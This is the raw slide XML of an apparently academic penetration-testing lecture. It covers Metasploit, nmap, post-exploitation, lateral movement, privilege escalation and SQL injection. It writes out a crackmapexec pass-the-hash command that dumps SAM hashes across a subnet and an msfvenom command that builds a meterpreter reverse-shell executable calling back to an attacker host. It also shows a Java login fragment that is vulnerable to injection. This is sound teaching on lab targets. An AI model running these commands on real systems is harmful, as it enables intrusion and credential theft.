          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008185" y="1969477"/>
            <a:ext cx="3892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services in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfconsole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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UnrealIRCd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one of Metasploit’s exploits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B5BF6-50D5-94CB-74AC-EE29ED07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90" y="994660"/>
            <a:ext cx="7354326" cy="2486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9B480-76A5-B4B1-6F19-09D808EC9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0" y="3653637"/>
            <a:ext cx="6123299" cy="1200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0D4E03-7A3C-E20C-5316-FE685E54A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319" y="4961956"/>
            <a:ext cx="7268589" cy="1867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8270E9-E204-71F5-DD03-0CC2E2F9D4D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7582269" y="3708335"/>
            <a:ext cx="3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exploits in target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307959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B7F0-A33B-A4DE-A31D-AF0DC16A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Five Stages of Custom Exploit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6B897-9728-2D66-384D-8F2F11C94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8ABB6-6805-863A-BFEB-79D10EB4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4" y="1629337"/>
            <a:ext cx="6668431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Wires Linked To Core Router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAC4424-3161-1846-8CA3-3220C489A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A7799-03CE-09BE-CD6E-F0DBEEA2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Maintaining Access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2695C-2470-175A-43E0-BBA614812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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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135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1381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0FB6E-B5BE-2112-5B98-73825036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Maintaining Access Activities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C7C46-CE27-E022-D494-E14133612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3467C-E67E-69ED-ABEA-4FA9C1C2A696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="1943100"/>
            <a:ext cx="541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Lateral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Exfiltration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Creating backdoor and persistent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68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AC9E-B920-37E5-D02F-87F10C86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Activities on compromised system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E2003-A798-B4BD-DF20-0817F9A5A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4183A-F8B1-E90D-C544-5FC30677D196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1905000"/>
            <a:ext cx="9544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Once we have access on the system (e.g. control a shell), we may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Employ network sniffer and keylogger to capture transmitted user credentials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Bettercap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Responder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Dsniff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search for locally stored passwords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Emails, locally stored pw in cleartext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NirSoft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www.nirsoft.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) provides various free tools that can be uploaded to compromised systems, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to extract passwords from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and caches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Fake DLLs (dynamic link libraries): place it in specific directory location, have the application using it load it and execute it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> elevated privileges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Buffer overflow or similar means to escalate privileges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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> script to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to escalate privileges etc.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074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2D49-5204-9DD4-3483-3F029720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Rapid Reconnaissance on Compromised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5F2C-458D-6B01-1DBA-36E23FDEA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C2A54-75A3-7228-1651-CC3D2B89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1177285"/>
            <a:ext cx="7335275" cy="1408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39863-79F5-B771-D795-E02E7325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63" y="2416576"/>
            <a:ext cx="7335274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6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94A3-1166-0A15-80E6-A853F51A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Meterpreter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C11E1-3252-0C41-C7E1-3B32664C5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8F0F2-6B0F-2839-14AC-9114C0CFE0D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1531620"/>
            <a:ext cx="6789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exploitation and post-exploit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2.180 exploits, 1.155 auxiliary, 399 post exploit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10677-12C9-ABEC-AFE0-91B3665E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262468"/>
            <a:ext cx="5585162" cy="43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3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AA60-0DD6-D059-BE06-555E309B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C26A-E5A5-C296-7EC8-523295D9A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>
              <a:defRPr sz="726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35156">
              <a:spcBef>
                <a:spcPts val="23"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" spc="-23"/>
              <a:pPr marL="35156">
                <a:spcBef>
                  <a:spcPts val="23"/>
                </a:spcBef>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" spc="-2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7DF3E-E892-B864-E316-0C724987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91" y="1669981"/>
            <a:ext cx="1556834" cy="687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3038A5-ED82-FFDE-646C-8D23552EB82E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1850091" y="2376701"/>
            <a:ext cx="7132471" cy="26340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square" lIns="57313" tIns="40119" rIns="57313" bIns="40119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727913" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcAft>
                <a:spcPts val="477"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1433" dirty="0">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-109" charset="-128"/>
              </a:rPr>
              <a:t>Open Web Application Security Project (OWASP) ist eine non-profit Organisation, die sich der Sicherheit von Software verschrieben hat.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F27876-E3D5-61C1-70D3-1F512900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26" y="3247033"/>
            <a:ext cx="7602292" cy="21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6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855D-D745-347A-54CE-972CFB72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Horizontal Escalation and Lateral Movement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7CB85-E708-1367-E7AE-BB5B8544D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EA8AD-31EB-6CED-A1C6-BDD96F0CDD11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877388" y="1346443"/>
            <a:ext cx="95489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Attacker retains existing credentials and uses them to act on a different user’s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Approaches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Extract hashes of common usernames like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Itsupport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>LocalAdministrators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> etc., try to crack the standard accounts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Crackmapexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>smv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> 10.10.10.1/24 –u username –d local –H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>hashvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sam</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	to extract password hashed on entire IP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4161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620-35AC-8112-A99D-52B0666D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 Escalations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DE4EE-31C5-71C3-3FDB-F05E56EF3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B51BE-7E95-03A9-7948-8432C8D5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43" y="1551289"/>
            <a:ext cx="7487695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02A2-7B6A-AFA9-8CBF-6F3139F1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Escalation Explained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D98B0-40D0-3DA6-ECAE-1AC125D29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884DF-36F2-CC7F-18A1-9366CC19924D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888274" y="2194560"/>
            <a:ext cx="9562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executable with payload </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=KALIIP LPORT=Port –f exe –o output.exe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Login to metasploitable3 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>normaluser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account and upload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file is in target, reverse shell is provided to Kali Linux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with user privileges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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploits that allow privilege escalation, e.g. via Meterpreter (background command)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8AB84-4526-16B5-F808-8742CCCA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96" y="4301227"/>
            <a:ext cx="6573167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1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2C3E-E4AC-35E7-CF8C-48F846D4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Aspects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6758A-F94D-DF37-091C-4DE726681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791FD-E1D2-FCE6-E0E7-01131C59FBFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809897" y="2063931"/>
            <a:ext cx="9235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 Security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on Application Layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> next session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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> next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Embedded Security  session after next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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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How do attackers proceed?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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Web Application Security Vulnerabilities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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Network Vulnerabilities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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="443489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Ethical Hacking and Penetration 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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="5496284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Useful Tools for PenTesting for Variouses Attack Phases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37361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2388-3221-3E7E-114B-CCAF3586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 to nmap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DE494-2834-C893-2AF1-8C7E9DD6EC5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539188" y="1982707"/>
            <a:ext cx="11037503" cy="451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8" dirty="0"/>
              <a:t>Use Cases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Audit the security aspects of networks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Simulate penetration tests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Check firewall and IDS settings and configurations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Types of possible connections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Network mapping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Response analysis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Identify open ports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Vulnerability assessment as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1798" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1798" dirty="0"/>
              <a:t>Nmap scanning techniques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Host discovery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Port scanning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Service enumeration and detection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OS detection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Scriptable interaction with the target service (Nmap Scripting Engine)</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1798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8D8F7-F419-B8C2-E8D9-EBB44F49B6A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161690" y="3439149"/>
            <a:ext cx="2968708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98" dirty="0"/>
              <a:t>Type nmap --help</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2001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E5FE-9EE7-FFD1-4215-41B352B5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9" y="1033734"/>
            <a:ext cx="7272725" cy="491931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Use Case – Discovering open tcp ports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9CD7E-6B63-06AE-56A6-5E82EDA3E558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345688" y="1982707"/>
            <a:ext cx="11535486" cy="175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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>By default, nmap scans top 1000 TCP ports with SYN scan (-sS) when run as root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DE" sz="1798" dirty="0"/>
              <a:t>-sT is the TCP connect scan: uses TCP handshake to determine if port is open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DE" sz="1798" dirty="0"/>
              <a:t>-p defines ports (-p22,25,80 or –p 22-445 as range or –top-ports=10)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DE" sz="1798" dirty="0"/>
              <a:t>--packet-trace provides details about sent packages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endParaRPr lang="en-DE" sz="1798" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285464" indent="-285464">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-DE" sz="1798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C2C3D-BACD-C5CE-E541-4CE274BE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09" y="3434075"/>
            <a:ext cx="7764312" cy="26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7D4-F7F7-EB5C-8196-8A862B24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9" y="415184"/>
            <a:ext cx="8033932" cy="1475791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Process for Enumeration with nmap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9A79AB2-7CB8-63DC-0888-8D0163120717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2594447" y="1754345"/>
          <a:ext cx="7717795" cy="4688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181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353B-5131-0543-15BF-543D3FA3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3031067" cy="894622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" dirty="0"/>
              <a:t>Packet Trace Nmap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3A196-8779-DA22-6616-08641F85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69" y="3568"/>
            <a:ext cx="7686334" cy="68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0444-EE83-ECC8-234C-689AC5D1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Connect Scan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9C341-A967-8348-5E0D-46146B0FFD91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345689" y="1982707"/>
            <a:ext cx="11459364" cy="202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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>uses three way handshake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G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>oal: determine if port is closed or open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GB" sz="1798" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>ost reliable way, also most stealthy way, but takes more effort / time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endParaRPr lang="en-DE" sz="1798" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-DE" sz="1798" dirty="0"/>
              <a:t>Why more stealthy?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-DE" sz="1798" dirty="0"/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DE" sz="1798" dirty="0"/>
              <a:t>Also useful when target host has firewall dropping incoming but allowing outgoing packets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EBAFB-92B8-9531-C707-C8DEFB07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14" y="4011918"/>
            <a:ext cx="7764312" cy="25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4" y="553251"/>
            <a:ext cx="2996773" cy="5301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0541" y="530199"/>
            <a:ext cx="3273398" cy="5532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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="354" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="204" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0"/>
              <a:t>Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="64" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="103" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrong?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417842" y="1562695"/>
            <a:ext cx="7746082" cy="3732711"/>
            <a:chOff x="1293914" y="1721858"/>
            <a:chExt cx="8535035" cy="4112895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1512313" y="1981200"/>
              <a:ext cx="8096884" cy="3619500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8096884" h="3619500">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8096699" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8096699" y="3619500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="361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A6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914" y="1721858"/>
              <a:ext cx="8535037" cy="411278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53176" y="2020745"/>
            <a:ext cx="6630936" cy="24965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dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18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action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dispatcher?operation=login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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>method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post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9882" y="2252916"/>
            <a:ext cx="3798986" cy="716796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="22476" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="11527" marR="4611">
              <a:lnSpc>
                <a:spcPts val="1824"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="177"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name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username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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type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text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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name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password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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type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password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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type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submit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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value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“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Submit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3176" y="2252916"/>
            <a:ext cx="892116" cy="937153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R="4611" algn="r">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="4611" algn="r">
              <a:lnSpc>
                <a:spcPts val="1828"/>
              </a:lnSpc>
            </a:pP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spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="4611" algn="r">
              <a:lnSpc>
                <a:spcPts val="1828"/>
              </a:lnSpc>
            </a:pP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spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="47258" algn="r">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pP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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form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53176" y="3413777"/>
            <a:ext cx="6866645" cy="1409294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="22476" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="11527" marR="830486" algn="just">
              <a:lnSpc>
                <a:spcPts val="1824"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="177"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100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username</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0"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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>request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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>getParameter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(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username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)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100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password</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0"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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>request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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>getParameter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(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password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)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-27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stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-45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endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
